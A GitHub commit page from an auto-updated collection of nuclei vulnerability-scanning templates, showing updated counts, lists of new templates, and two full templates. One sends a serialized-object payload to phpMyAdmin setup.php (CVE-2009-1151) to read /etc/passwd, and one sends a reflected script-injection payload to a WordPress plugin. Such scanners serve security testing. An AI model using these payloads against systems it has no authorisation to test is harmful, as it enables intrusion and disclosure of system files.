Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Oct 2, 2024
1 parent ce73035 commit 7077e68
Show file tree
Hide file tree
Showing 3,546 changed files with 970,246 additions and 39,112 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
136 changes: 74 additions & 62 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,74 +15,86 @@
| CVE-2011 | 91 |
| CVE-2012 | 145 |
| CVE-2013 | 169 |
| CVE-2014 | 422 |
| CVE-2014 | 421 |
| CVE-2015 | 528 |
| CVE-2016 | 248 |
| CVE-2017 | 398 |
| CVE-2018 | 446 |
| CVE-2018 | 445 |
| CVE-2019 | 515 |
| CVE-2020 | 593 |
| CVE-2021 | 1727 |
| CVE-2022 | 2473 |
| CVE-2023 | 4771 |
| CVE-2024 | 5214 |
| Other | 25413 |
| CVE-2020 | 594 |
| CVE-2021 | 1726 |
| CVE-2022 | 2472 |
| CVE-2023 | 4770 |
| CVE-2024 | 5251 |
| Other | 25445 |
## 近几天数量变化情况
|2024-09-25 | 2024-09-26 | 2024-09-27 | 2024-09-28 | 2024-09-29 | 2024-09-30 | 2024-10-01|
|2024-09-26 | 2024-09-27 | 2024-09-28 | 2024-09-29 | 2024-09-30 | 2024-10-01 | 2024-10-02|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|43315 | 43396 | 43436 | 43455 | 43462 | 43468 | 43520|
|43396 | 43436 | 43455 | 43462 | 43468 | 43520 | 43585|
## 最近新增文件
| templates name |
| --- |
| Nsfocus-SAS-read-GetFile.yaml |
| jinher-oa-sql-time-GetTreeDate.yaml |
| yongyou-ksoa-sql-servletimagefield.yaml |
| camaleon-panel.yaml |
| yongyou-grp-u8-sql-time-bx_historyDataCheck.yaml |
| seeyon-M1Server-rce-userTokenService.yaml |
| geoserver-rce-cve-2024-30641.yaml |
| qiwang-erp-sql-comboxstore.yaml |
| Nsfocus-SAS-rce-Exec.yaml |
| jumpserver-session-unauth.yaml |
| NewCapec-rce-service.yaml |
| pgadmin4.yaml |
| ruijie-switch-configuration-leak.yaml |
| js-version-dompurify_3-0-11.yaml |
| yongyou-ksoa-sql-time-PayBill.yaml |
| wanhu-ezOFFICE-sql-time-productlist.yaml |
| wanhu-ezOFFICE-upload-wpsservlet.yaml |
| anheng-DAS-USM-SSRF-xmlrpc.yaml |
| camaleon_cms.yaml |
| qax-SecGate-3600_upload_upfile.yaml |
| Esafenet-CDG-upload-UploadFileFromClientServiceForClient.yaml |
| yongyou-ksoa-sql-time-TaskRequestServlet.yaml |
| chanjet-Tplus-rce-oob-GetStoreWarehouseByStore.yaml |
| Kingdee-Cloud-rce-kdsvc.yaml |
| Kingdee-Cloud-read-CommonFileServer.yaml |
| yongyou-u8-crm-upload-getemaildata.yaml |
| mingyuanyun-ERP-upload-ApiUpdate.yaml |
| anheng-DAS-Gateway-rce-suffix.yaml |
| wecrm-crm-sql-SmsDataList.yaml |
| kinpan-wechat-unauthorized-getsysteminfo.yaml |
| finereport_data_decision_system_unserialize.yaml |
| Nsfocus-SAS-login-bypass-local_user.yaml |
| weaver-E-Office-upload-upload.yaml |
| chanjet-Tplus-upload-Upload.yaml |
| yongyou-nc-cloud-upload-jsinvoke.yaml |
| camaleon-default-login.yaml |
| yongyou-u8-crm-fileread-getemaildata.yaml |
| HJSOFT-HCM-upload-OfficeServer.yaml |
| glodon-linkworks-sql-GetIMDictionary.yaml |
| tongda-oa-rce-moare.yaml |
| docuware-panel.yaml |
| hikvision_isecure_center_unauth_upload_files.yaml |
| yongyou-mobile-upload-uploadApk.yaml |
| cnpower-oa-sql-workFlowService.yaml |
| lobechat-detect.yaml |
| HJSOFT-HCM-sql-codesettree.yaml |
| dahua-loginpass-leak.yaml |
| jinher-oa-sql-GetSqlData.yaml |
| CVE-2024-9014.yaml |
| CVE-2024-6845.yaml |
| CVE-2024-30269.yaml |
| CVE-2024-46986.yaml |
| svg-complete.yaml |
| avif-support.yaml |
| hello-world.yaml |
| pdf-image-generator.yaml |
| auto-featured-image-from-title.yaml |
| stars-testimonials-with-slider-and-masonry-grid.yaml |
| dk-pdf.yaml |
| r-animated-icon.yaml |
| relogo.yaml |
| loggedin.yaml |
| qs-dark-mode.yaml |
| guten-post-layout.yaml |
| opt-in-hound.yaml |
| unseen-blog.yaml |
| locateandfilter.yaml |
| easy-load-more.yaml |
| wechat-social-login.yaml |
| rss-feed-post-generator-echo.yaml |
| lh-copy-media-file.yaml |
| ultrapress.yaml |
| gravity-forms-toolbar.yaml |
| elastik-page-builder.yaml |
| wp-wc-affiliate-program.yaml |
| soumettre-fr.yaml |
| empowerment.yaml |
| CVE-2024-9272.yaml |
| CVE-2024-9209.yaml |
| CVE-2024-8981.yaml |
| CVE-2024-7432.yaml |
| CVE-2024-8107.yaml |
| CVE-2024-9224.yaml |
| CVE-2024-8799.yaml |
| CVE-2024-8727.yaml |
| CVE-2024-9060.yaml |
| CVE-2024-8718.yaml |
| CVE-2024-8793.yaml |
| CVE-2024-9289.yaml |
| CVE-2024-9108.yaml |
| CVE-2024-9118.yaml |
| CVE-2024-9241.yaml |
| CVE-2024-8324.yaml |
| CVE-2024-9228.yaml |
| CVE-2024-9269.yaml |
| CVE-2024-9274.yaml |
| CVE-2024-7869.yaml |
| CVE-2024-7433.yaml |
| CVE-2024-8288.yaml |
| CVE-2024-8786.yaml |
| CVE-2024-9220.yaml |
| CVE-2024-7434.yaml |
| CVE-2024-8990.yaml |
| CVE-2024-9106.yaml |
| CVE-2024-9304.yaml |
| CVE-2024-8430.yaml |
| CVE-2024-8548.yaml |
| CVE-2024-8675.yaml |
| CVE-2024-9119.yaml |
| CVE-2024-9267.yaml |
| CVE-2024-8989.yaml |
| CVE-2024-8720.yaml |
| CVE-2024-8728.yaml |
| CVE-2024-9265.yaml |
| CVE-2024-8632.yaml |
| CVE-2024-9018.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -206,5 +206,6 @@
"2024-09-28": 43455,
"2024-09-29": 43462,
"2024-09-30": 43468,
"2024-10-01": 43520
"2024-10-01": 43520,
"2024-10-02": 43585
}
66 changes: 65 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -50711,5 +50711,69 @@
"CVE-2024-9014.yaml": "2024-10-01 02:41:25",
"CVE-2024-6845.yaml": "2024-10-01 02:41:25",
"CVE-2024-30269.yaml": "2024-10-01 02:41:25",
"CVE-2024-46986.yaml": "2024-10-01 02:41:25"
"CVE-2024-46986.yaml": "2024-10-01 02:41:25",
"svg-complete.yaml": "2024-10-02 02:26:07",
"avif-support.yaml": "2024-10-02 02:26:07",
"hello-world.yaml": "2024-10-02 02:26:07",
"pdf-image-generator.yaml": "2024-10-02 02:26:07",
"auto-featured-image-from-title.yaml": "2024-10-02 02:26:07",
"stars-testimonials-with-slider-and-masonry-grid.yaml": "2024-10-02 02:26:07",
"dk-pdf.yaml": "2024-10-02 02:26:07",
"r-animated-icon.yaml": "2024-10-02 02:26:07",
"relogo.yaml": "2024-10-02 02:26:07",
"loggedin.yaml": "2024-10-02 02:26:07",
"qs-dark-mode.yaml": "2024-10-02 02:26:07",
"guten-post-layout.yaml": "2024-10-02 02:26:07",
"opt-in-hound.yaml": "2024-10-02 02:26:07",
"unseen-blog.yaml": "2024-10-02 02:26:07",
"locateandfilter.yaml": "2024-10-02 02:26:07",
"easy-load-more.yaml": "2024-10-02 02:26:07",
"wechat-social-login.yaml": "2024-10-02 02:26:07",
"rss-feed-post-generator-echo.yaml": "2024-10-02 02:26:07",
"lh-copy-media-file.yaml": "2024-10-02 02:26:07",
"ultrapress.yaml": "2024-10-02 02:26:07",
"gravity-forms-toolbar.yaml": "2024-10-02 02:26:07",
"elastik-page-builder.yaml": "2024-10-02 02:26:07",
"wp-wc-affiliate-program.yaml": "2024-10-02 02:26:07",
"soumettre-fr.yaml": "2024-10-02 02:26:07",
"empowerment.yaml": "2024-10-02 02:26:07",
"CVE-2024-9272.yaml": "2024-10-02 02:26:07",
"CVE-2024-9209.yaml": "2024-10-02 02:26:07",
"CVE-2024-8981.yaml": "2024-10-02 02:26:07",
"CVE-2024-7432.yaml": "2024-10-02 02:26:07",
"CVE-2024-8107.yaml": "2024-10-02 02:26:07",
"CVE-2024-9224.yaml": "2024-10-02 02:26:07",
"CVE-2024-8799.yaml": "2024-10-02 02:26:07",
"CVE-2024-8727.yaml": "2024-10-02 02:26:07",
"CVE-2024-9060.yaml": "2024-10-02 02:26:07",
"CVE-2024-8718.yaml": "2024-10-02 02:26:07",
"CVE-2024-8793.yaml": "2024-10-02 02:26:07",
"CVE-2024-9289.yaml": "2024-10-02 02:26:07",
"CVE-2024-9108.yaml": "2024-10-02 02:26:07",
"CVE-2024-9118.yaml": "2024-10-02 02:26:07",
"CVE-2024-9241.yaml": "2024-10-02 02:26:07",
"CVE-2024-8324.yaml": "2024-10-02 02:26:07",
"CVE-2024-9228.yaml": "2024-10-02 02:26:07",
"CVE-2024-9269.yaml": "2024-10-02 02:26:07",
"CVE-2024-9274.yaml": "2024-10-02 02:26:07",
"CVE-2024-7869.yaml": "2024-10-02 02:26:07",
"CVE-2024-7433.yaml": "2024-10-02 02:26:07",
"CVE-2024-8288.yaml": "2024-10-02 02:26:07",
"CVE-2024-8786.yaml": "2024-10-02 02:26:07",
"CVE-2024-9220.yaml": "2024-10-02 02:26:07",
"CVE-2024-7434.yaml": "2024-10-02 02:26:07",
"CVE-2024-8990.yaml": "2024-10-02 02:26:07",
"CVE-2024-9106.yaml": "2024-10-02 02:26:07",
"CVE-2024-9304.yaml": "2024-10-02 02:26:07",
"CVE-2024-8430.yaml": "2024-10-02 02:26:07",
"CVE-2024-8548.yaml": "2024-10-02 02:26:07",
"CVE-2024-8675.yaml": "2024-10-02 02:26:07",
"CVE-2024-9119.yaml": "2024-10-02 02:26:07",
"CVE-2024-9267.yaml": "2024-10-02 02:26:07",
"CVE-2024-8989.yaml": "2024-10-02 02:26:07",
"CVE-2024-8720.yaml": "2024-10-02 02:26:07",
"CVE-2024-8728.yaml": "2024-10-02 02:26:07",
"CVE-2024-9265.yaml": "2024-10-02 02:26:07",
"CVE-2024-8632.yaml": "2024-10-02 02:26:07",
"CVE-2024-9018.yaml": "2024-10-02 02:26:07"
}
1 change: 1 addition & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -475,3 +475,4 @@ https://github.com/0xBl4nk/ssti-detection-nuclei
https://github.com/ibnurusdianto/nucley
https://github.com/hackintoanetwork/nuclei-priv-templates
https://github.com/hanc00l/some_nuclei_templates
https://github.com/iamunixtz/Priv8-nuclei-templates
38 changes: 0 additions & 38 deletions nuclei-templates/CVE-2009/CVE-2009-1151.yaml

This file was deleted.

44 changes: 44 additions & 0 deletions nuclei-templates/CVE-2009/cve-2009-1151.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
id: CVE-2009-1151

info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
metadata:
max-request: 1

http:
- raw:
- |
POST /scripts/setup.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/07/06
46 changes: 46 additions & 0 deletions nuclei-templates/CVE-2013/CVE-2013-6281.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
id: CVE-2013-6281

info:
name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
author: random-robbie
severity: medium
description: |
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2013-6281
cwe-id: CWE-79
metadata:
google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
verified: "true"
tags: cve,cve2013,wordpress,xss,wp-plugin,wp

requests:
- raw:
- |
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "page: '<script>alert(document.domain)</script>'"
- "dhx_rel_path"
condition: and

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
Loading

0 comments on commit 7077e68

Please sign in to comment.